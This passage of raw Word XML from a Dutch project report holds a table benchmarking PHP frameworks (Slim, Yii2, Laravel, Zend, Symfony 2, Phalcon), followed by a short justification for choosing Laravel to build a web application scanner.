          <w:p w14:paraId="4509D17A" w14:textId="6E7CE1EE" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00B4687D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Slim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24B5FCCE" w14:textId="01F567A7" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00B4687D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>9,779 (4.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74B02940" w14:textId="2DC1BB22" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00DA1DA2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>29.3 ms (</w:t>
            </w:r>
            <w:r w:rsidR="00730FFA" w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>1.0%</w:t>
            </w:r>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B4687D" w14:paraId="752DA909" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B0C949C" w14:textId="6554D0C2" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00B4687D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Yii2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CADF8D2" w14:textId="0F9A0011" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00B4687D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>6,789 (3.2%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="092F4318" w14:textId="0C432B75" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="001C029D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>39.6 ms (1.4%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B4687D" w14:paraId="2086DE02" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77DF8EE2" w14:textId="0CAE7333" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00B4687D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Laravel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56797461" w14:textId="035D5B2B" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00B4687D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>5,385 (2.6%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C7285E2" w14:textId="4F7D3554" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00540F9E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>51.9 ms (1.8%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B4687D" w14:paraId="155D61D6" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CDA76BA" w14:textId="1A2F77A3" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00B4687D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Zend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44099F47" w14:textId="5FAB4E24" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="00B4687D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>3,965 (1.9%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40303B3D" w14:textId="6D8C4D10" w:rsidR="00B4687D" w:rsidRPr="00B94177" w:rsidRDefault="000B1156">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>67.9 ms (2.4%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B173C" w14:paraId="56F8FB70" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3360ECF2" w14:textId="28D2DB0B" w:rsidR="002B173C" w:rsidRPr="00B94177" w:rsidRDefault="002B173C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Symfony 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="286ED64F" w14:textId="56BA298A" w:rsidR="002B173C" w:rsidRPr="00B94177" w:rsidRDefault="001C7B9A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>2,508 (1.2%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F2058BC" w14:textId="237B7653" w:rsidR="002B173C" w:rsidRPr="00B94177" w:rsidRDefault="00E44FC8">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>105.4 ms (3.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B723C" w14:paraId="02038873" w14:textId="77777777" w:rsidTr="00F730AB">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBE755"/>
          </w:tcPr>
          <w:p w14:paraId="0BA6331D" w14:textId="78654F47" w:rsidR="001B723C" w:rsidRPr="00B94177" w:rsidRDefault="001B723C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Data updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA1C66" w14:paraId="7A1DE790" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58A3F147" w14:textId="3E83BD47" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Slim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="246C1F8A" w14:textId="498A4E27" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>768 (17.5%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6302B671" w14:textId="39939FA1" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00A43F92">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>330.0 ms (5.7</w:t>
            </w:r>
            <w:r w:rsidR="00EE5C77" w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA1C66" w14:paraId="713D5624" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5718668E" w14:textId="47302381" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Zend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E234C6C" w14:textId="49B36C07" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>766 (17.5%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B37A839" w14:textId="20A6C9AC" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00EE5C77">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>330.4 ms (5.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA1C66" w14:paraId="679093C9" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72111F8E" w14:textId="1DBC4555" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Yii2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15F46DCB" w14:textId="0D8A486C" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>762 (17.4%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D24CB1A" w14:textId="558ADB94" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="008579C8">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>332.2 ms (5.8%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA1C66" w14:paraId="4862C11B" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="040C3A34" w14:textId="4956C904" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Phalcon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64217CE2" w14:textId="0B1FF7BC" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>642 (14.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73C0D971" w14:textId="6762DF04" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="004E44CE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>398.4 ms (6.9%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00651762" w14:paraId="789CB71E" w14:textId="77777777" w:rsidTr="00353384">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2375A979" w14:textId="19F5A086" w:rsidR="00651762" w:rsidRPr="00B94177" w:rsidRDefault="00651762">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Symfony 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73F33E7A" w14:textId="6D3B917A" w:rsidR="00651762" w:rsidRPr="00B94177" w:rsidRDefault="00651762">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>321 (7.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55B0BF03" w14:textId="7833A85F" w:rsidR="00651762" w:rsidRPr="00B94177" w:rsidRDefault="003C5ACC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>490</w:t>
            </w:r>
            <w:r w:rsidR="00531E3F" w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.8 ms (8.5%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA1C66" w14:paraId="6D12D8FA" w14:textId="77777777" w:rsidTr="00353384">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40A6495C" w14:textId="36045AF9" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Laravel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46591382" w14:textId="34A0BED3" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="624E334C" w14:textId="15C57C79" w:rsidR="00CA1C66" w:rsidRPr="00B94177" w:rsidRDefault="00CA1C66">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E65B833" w14:textId="2ABB426A" w:rsidR="00F35514" w:rsidRDefault="00B9069F" w:rsidP="00F35514">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252171264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="64613889" wp14:editId="6BA06E37">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-902335</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-4818380</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="498" name="Rectangle 49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D28F1" id="Rectangle 498" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.05pt;margin-top:-379.35pt;width:25pt;height:1031.7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tC5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v8q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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00416841">
        <w:t>Tabel 3.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009D02E6" w14:textId="0823B2C7" w:rsidR="00E516D4" w:rsidRPr="00E516D4" w:rsidRDefault="00E516D4" w:rsidP="0041492C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E516D4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Performance reviews</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472D0E17" w14:textId="682663BB"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391D4EA" w14:textId="065BE935" w:rsidR="00D5423C" w:rsidRPr="00BB4E5D"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4C90C96C" w14:textId="4143CBA0" w:rsidR="00866303" w:rsidRPr="002C7958" w:rsidRDefault="002C7958">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C7958">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Zend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B59D08" w14:textId="197457F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5280669E" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22EDA460" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C7BCB6" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="369F50AF" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18E716C1" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7460A108" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A0EB594" w14:textId="6618AD46" w:rsidR="005A119C" w:rsidRDefault="005A119C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253195264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6CD959F4" wp14:editId="648913B5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-895350</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-721238</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="27" name="Rectangle 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6BA32" id="Rectangle 27" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.5pt;margin-top:-56.75pt;width:25pt;height:1031.7pt;z-index:-2501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hAaZoCAACx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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="439EFE1E" w14:textId="42AB139B" w:rsidR="008D5DD7" w:rsidRPr="0093287C" w:rsidRDefault="008D5DD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0093287C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Symphony2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405C9336" w14:textId="16F59318"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4277F31A"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66D0574B" w14:textId="141E081A" w:rsidR="00CE02C1" w:rsidRPr="009C73A3" w:rsidRDefault="00E67AF0">
      <w:r>
        <w:t xml:space="preserve">Voor dit project </w:t>
      </w:r>
      <w:r w:rsidR="008E76A7">
        <w:t>is iedere PHP f</w:t>
      </w:r>
      <w:r w:rsidR="00CC21CC">
        <w:t>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t>
      </w:r>
      <w:r w:rsidR="000422AA">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="0026778C">
        <w:t xml:space="preserve"> bevat. Laravel is de PHP Framework die mij de tools, flexibiliteit en ondersteuning kan bieden om van dit project een geslaagd </w:t>
      </w:r>
      <w:r w:rsidR="005034D0">
        <w:t>project te maken.</w:t>
      </w:r>
      <w:r w:rsidR="005A30D4">
        <w:t xml:space="preserve"> Omdat Laravel RESTfull Routing a</w:t>
      </w:r>
      <w:r w:rsidR="00F14986">
        <w:t>ls feature heeft is een andere f</w:t>
      </w:r>
      <w:r w:rsidR="00D94D1C">
        <w:t>ramework zoals Slim overbodig.</w:t>
      </w:r>
      <w:r w:rsidR="00CE02C1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C5F21F" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00E13197">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E69AA1" w14:textId="77777777" w:rsidR="005A119C" w:rsidRDefault="005A119C" w:rsidP="00E13197">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15150DF8" w14:textId="323E4E7D" w:rsidR="0060748C" w:rsidRDefault="00394B19" w:rsidP="00E13197">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252173312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="26D07CBC" wp14:editId="04B131DD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-904522</wp:posOffset>
